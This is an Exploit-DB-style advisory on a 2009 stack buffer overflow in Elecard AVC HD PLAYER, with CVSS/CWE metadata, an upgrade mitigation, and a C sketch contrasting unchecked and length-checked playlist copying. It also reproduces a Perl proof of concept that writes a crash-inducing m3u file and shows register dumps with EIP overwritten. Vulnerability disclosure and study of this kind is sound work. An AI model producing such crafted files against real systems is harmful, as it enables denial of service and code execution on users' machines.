vendor: AVC HD PLAYER
by: AlpHaNiX
CVSS: 9.3 HIGH
Stack Overflow
CWE: 120 (Buffer Copy without Checking Size of Input)
Product Name: AVC HD PLAYER
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC

Elecard AVC HD PLAYER is prone to a local stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Mitigation:

Upgrade to the latest version of Elecard AVC HD PLAYER.
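
The CWE-120 pattern described above, sketched in C beside a length-checked form that rejects an overlong playlist entry instead of copying it. This is an added example, not Elecard's code or the PoC author's; `ENTRY_MAX`, the function names and the buffer sizes are assumptions, and the sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

#define ENTRY_MAX 1024  /* assumed capacity; the player's real buffer size is not on the page */

/* CWE-120 pattern: copies a playlist line into a fixed stack buffer without
 * checking its length. Shown for contrast only; never called here. */
void load_entry_unchecked(const char *line)
{
    char entry[ENTRY_MAX];
    strcpy(entry, line);            /* a line longer than ENTRY_MAX-1 writes past entry[] */
}

/* Hardened form: measure first, reject overlong input instead of
 * truncating it, and only then copy. Returns 0 on success, -1 on reject. */
int load_entry_checked(const char *line, char *out, size_t out_size)
{
    size_t len;
    if (line == NULL || out == NULL || out_size == 0)
        return -1;
    len = strcspn(line, "\r\n");    /* entry ends at the first line break */
    if (len >= out_size)            /* no room left for the terminating NUL */
        return -1;
    memcpy(out, line, len);
    out[len] = '\0';
    return 0;
}

/* Constructed sample input: "http://" followed by n filler bytes. */
int try_entry_of_length(size_t n)
{
    static char line[8192];
    char entry[ENTRY_MAX];
    const char *scheme = "http://";
    size_t s = strlen(scheme);
    if (s + n >= sizeof line)
        return -1;
    memcpy(line, scheme, s);
    memset(line + s, 'A', n);
    line[s + n] = '\0';
    return load_entry_checked(line, entry, sizeof entry);
}

int main(void)
{
    printf("32-byte entry:   %d\n", try_entry_of_length(32));
    printf("2353-byte entry: %d\n", try_entry_of_length(2353));
    return 0;
}
```

Rejecting rather than truncating matters for a URL or path: a silently shortened entry would point at a different resource than the one the playlist named.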

Exploit-DB raw data:

#!/usr/bin/perl
#Elecard AVC HD PLAYER m3u/xpl file Local Stack Overflow POC
#Found By AlpHaNiX
#From NullArea.Net
###########################
#    proof of concept    
###########################
#Stack gets overflowed starting from 2353 chars
#EIP overwritten
#------------------
#     REGISTERS
#------------------
#EAX 00000000
#ECX 41414141
#EDX 775A104D ntdll.775A104D
#EBX 00000000
#ESP 0012BC9C
#EBP 0012BCBC
#ESI 00000000
#EDI 00000000
#EIP 41414141
#------------------
#  Dump From Stack
#------------------
#0012D000   41414141
#0012D004   41414141
#0012D008   41414141
#0012D00C   41414141
#0012D010   41414141
#0012D014   41414141
#0012D018   41414141
#0012D01C   41414141
#0012D020   41414141
#0012D024   41414141
#0012D028   41414141

my $file = "alpix.m3u" ;
my $poc="http://"."A" x 2353 ;
open(alpix, ">>$file") or die "Cannot open $file";
print alpix $poc;
close(alpix);
print "\n[+] done ! , $file created";

# milw0rm.com [2009-02-02]